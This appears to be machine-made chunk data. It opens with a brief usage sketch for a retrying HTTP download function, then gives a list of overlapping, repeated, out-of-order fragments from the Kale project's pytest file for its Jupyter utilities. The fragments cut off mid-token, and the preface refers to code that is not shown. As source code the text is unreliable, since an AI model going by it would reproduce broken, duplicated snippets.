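A short usage sketch of the retry behaviour above: only 5xx server errors are retried, client errors and successes return immediately. The 404 and 200 URLs are illustrative additions; only the 500 endpoint appears in the original __main__ block.

# Usage sketch: 5xx responses are retried up to num_retries times, 4xx are not.
page = download('http://httpstat.us/500')  # retried twice, then returns None
page = download('http://httpstat.us/404')  # client error: no retry, returns None
page = download('http://httpstat.us/200')  # returns the raw response bytes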
[
"target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside",
"KIND, either express or implied. # See the License for the specific language",
"Unless required by applicable law or agreed to in writing, software # distributed",
"`data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([],",
"been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage':",
"'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), #",
"'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath =",
"and # limitations under the License. import os import json import pytest from",
"test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value =",
"= 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) #",
"x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\"",
"this file except in compliance with the License. # You may obtain a",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def",
"a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # ---",
"that Python code runs inside a jupyter kernel successfully.\"\"\" # test standard code",
"{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs',",
"(_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell",
"x: x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel",
"ANY KIND, either express or implied. # See the License for the specific",
"{\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file",
"pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath)",
"code runs inside a jupyter kernel successfully.\"\"\" # test standard code code =",
"tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod'",
"import mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' #",
"(\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some dull",
"'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check",
"json import pytest from testfixtures import mock from kale.utils import jupyter_utils as ju",
"updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'",
"# update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns'",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):",
"updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is",
"be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), #",
"from testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data): #",
"exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir,",
"OF ANY KIND, either express or implied. # See the License for the",
"markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base =",
"os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check",
"= os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) #",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test",
"pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp",
"'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base,",
"'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda",
"correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base",
"markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w'))",
"== target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs",
"assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code():",
"has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app',",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs)",
"pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update",
"json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]}",
"jupyter kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", )",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value =",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"the License. import os import json import pytest from testfixtures import mock from",
"tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated =",
"return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}),",
"[markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target",
"== ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when",
"= {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def",
"that the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value =",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base =",
"{\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target",
"required by applicable law or agreed to in writing, software # distributed under",
"a jupyter kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\",",
"pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown = { 'type': 'markdown',",
"test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it does not exists.\"\"\"",
"applicable law or agreed to in writing, software # distributed under the License",
"2020 The Kale Authors # # Licensed under the Apache License, Version 2.0",
"target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated",
"or agreed to in writing, software # distributed under the License is distributed",
"The Kale Authors # # Licensed under the Apache License, Version 2.0 (the",
"file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value =",
"{\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated ==",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown",
"filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file",
"code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code",
"filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath)",
"def test_run_code(): \"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" #",
"under the License. import os import json import pytest from testfixtures import mock",
"\"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\"",
"\"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # ---",
"= { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\":",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"License. # You may obtain a copy of the License at # #",
"'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")),",
"(_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")),",
"target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace",
"the uimetadata file is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns'",
"compliance with the License. # You may obtain a copy of the License",
"is updated inplace correctly.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk'",
"updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source':",
"'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test",
"limitations under the License. import os import json import pytest from testfixtures import",
"pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\": []} filepath",
"for the specific language governing permissions and # limitations under the License. import",
"# `data` must be a list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"--- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}),",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata",
"file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, {",
"Kale Authors # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) #",
"jupyter_utils as ju def _output_display(data): # `data` must be a list return [{'output_type':",
"not use this file except in compliance with the License. # You may",
"[{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\",",
"check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{",
"= {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp",
"\"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")),",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\"",
"import jupyter_utils as ju def _output_display(data): # `data` must be a list return",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"create base tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some",
"ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from cell outputs.\"\"\" assert",
"from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the",
"list return [{'output_type': 'display_data', 'data': data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png':",
"when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value =",
"= 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file",
"import os import json import pytest from testfixtures import mock from kale.utils import",
"= 'test_wk' # create base tmp file markdown = { 'type': 'markdown', 'storage':",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file base = {\"outputs\":",
"# limitations under the License. import os import json import pytest from testfixtures",
"correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source':",
"# you may not use this file except in compliance with the License.",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test that the",
"correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio',",
"kernel successfully.\"\"\" # test standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code)",
"agreed to in writing, software # distributed under the License is distributed on",
"(the \"License\"); # you may not use this file except in compliance with",
"inside a jupyter kernel successfully.\"\"\" # test standard code code = (\"a =",
"# Unless required by applicable law or agreed to in writing, software #",
"governing permissions and # limitations under the License. import os import json import",
"by applicable law or agreed to in writing, software # distributed under the",
"open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"import json import pytest from testfixtures import mock from kale.utils import jupyter_utils as",
"ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact",
"tmpdir): \"\"\"Test the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value",
"\"\"\"Tests html artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def",
"--- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation from",
"file except in compliance with the License. # You may obtain a copy",
"'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test',",
"tmp file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' }",
"updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio',",
"'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir): \"\"\"Test",
"License for the specific language governing permissions and # limitations under the License.",
"to in writing, software # distributed under the License is distributed on an",
"# --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs,",
"= os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has",
"implied. # See the License for the specific language governing permissions and #",
"'tmp_uimetadata.json') # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated",
"\"License\"); # you may not use this file except in compliance with the",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"artifact generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir):",
"new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside a jupyter",
"'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test', uimetadata_path=filepath) # check file",
"check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown,",
"Python code runs inside a jupyter kernel successfully.\"\"\" # test standard code code",
"'#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath,",
"= json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]}",
"'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils,",
"the specific language governing permissions and # limitations under the License. import os",
"or implied. # See the License for the specific language governing permissions and",
"target = {\"outputs\": [markdown, { 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert",
"([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"),",
"# check file has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\":",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"os import json import pytest from testfixtures import mock from kale.utils import jupyter_utils",
"standard code code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the",
"data}] @pytest.mark.parametrize(\"outputs,target\", [ ([], \"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # ---",
"mock from kale.utils import jupyter_utils as ju def _output_display(data): # `data` must be",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update",
"file markdown = { 'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base",
"'type': 'markdown', 'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath",
"target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace",
"runs inside a jupyter kernel successfully.\"\"\" # test standard code code = (\"a",
"ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is created when it",
"= 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') #",
"json.loads(open(filepath).read()) target = {\"outputs\": [{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert",
"does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"you may not use this file except in compliance with the License. #",
"ju def _output_display(data): # `data` must be a list return [{'output_type': 'display_data', 'data':",
"--- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain':",
"has been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type':",
"'storage': 'inline', 'source': '#Some markdown' } base = {\"outputs\": [markdown]} filepath = os.path.join(tmpdir,",
"'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_empty(pod_utils, tmpdir):",
"Copyright 2020 The Kale Authors # # Licensed under the Apache License, Version",
"== target @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated",
"use this file except in compliance with the License. # You may obtain",
"generation from cell outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test",
"# Copyright 2020 The Kale Authors # # Licensed under the Apache License,",
"\"\"), # --- (_output_display({'image/png': \"bytes\"}), ju.image_html_template.format(\"\", \"bytes\")), # --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), #",
"been updated correctly updated = json.loads(open(filepath).read()) target = {\"outputs\": [markdown, { 'type': 'web-app',",
"# --- (_output_display({'text/html': \"bytes\"}), \"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript':",
"(_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests",
"uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"@mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code runs inside a",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"= 'test_wk' # create base tmp file base = {\"outputs\": []} filepath =",
"[{ 'type': 'web-app', 'storage': 'minio', 'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz' }]} assert updated == target @mock.patch('kale.utils.jupyter_utils.pod_utils')",
"pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' # create base tmp file markdown =",
"[]} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update tmp file ju.update_uimetadata('test',",
"}]} assert updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that",
"# # Unless required by applicable law or agreed to in writing, software",
"express or implied. # See the License for the specific language governing permissions",
"specific language governing permissions and # limitations under the License. import os import",
"= 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') # update tmp file",
"code = (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code =",
"either express or implied. # See the License for the specific language governing",
"ju.update_uimetadata('test', uimetadata_path=filepath) # check file has been updated correctly updated = json.loads(open(filepath).read()) target",
"\"\"\"Test the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value =",
"= (\"a = 3\\nprint(a)\", ) ju.run_code(code) # test magic command code = (\"%%time\\nprint('Some",
"not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod' pod_utils.get_namespace.return_value = 'test_ns' pod_utils.get_workflow_name.return_value = 'test_wk' filepath =",
"pytest from testfixtures import mock from kale.utils import jupyter_utils as ju def _output_display(data):",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"\"bytes\"), # --- (_output_display({'text/plain': \"bytes\"}), ju.text_html_template.format(\"bytes\")), # --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def",
"base = {\"outputs\": []} filepath = os.path.join(tmpdir, 'tmp_uimetadata.json') json.dump(base, open(filepath, 'w')) # update",
"# --- (_output_display({'application/javascript': \"bytes\"}), ju.javascript_html_template.format(\"bytes\")), ]) def test_generate_html_output(outputs, target): \"\"\"Tests html artifact generation",
"the uimetadata file is created when it does not exists.\"\"\" pod_utils.get_pod_name.return_value = 'test_pod'",
"@mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_from_not_empty(pod_utils, tmpdir): \"\"\"Test that the uimetadata file is updated inplace correctly.\"\"\"",
"\"\"\"Test that Python code runs inside a jupyter kernel successfully.\"\"\" # test standard",
"outputs.\"\"\" assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file",
"assert target == ju.generate_html_output(outputs) @mock.patch('kale.utils.jupyter_utils.pod_utils') def test_update_uimetadata_not_exists(pod_utils, tmpdir): \"\"\"Test the uimetadata file is",
"updated == target @mock.patch('kale.utils.jupyter_utils.process_outputs', new=lambda x: x) def test_run_code(): \"\"\"Test that Python code",
"the License. # You may obtain a copy of the License at #",
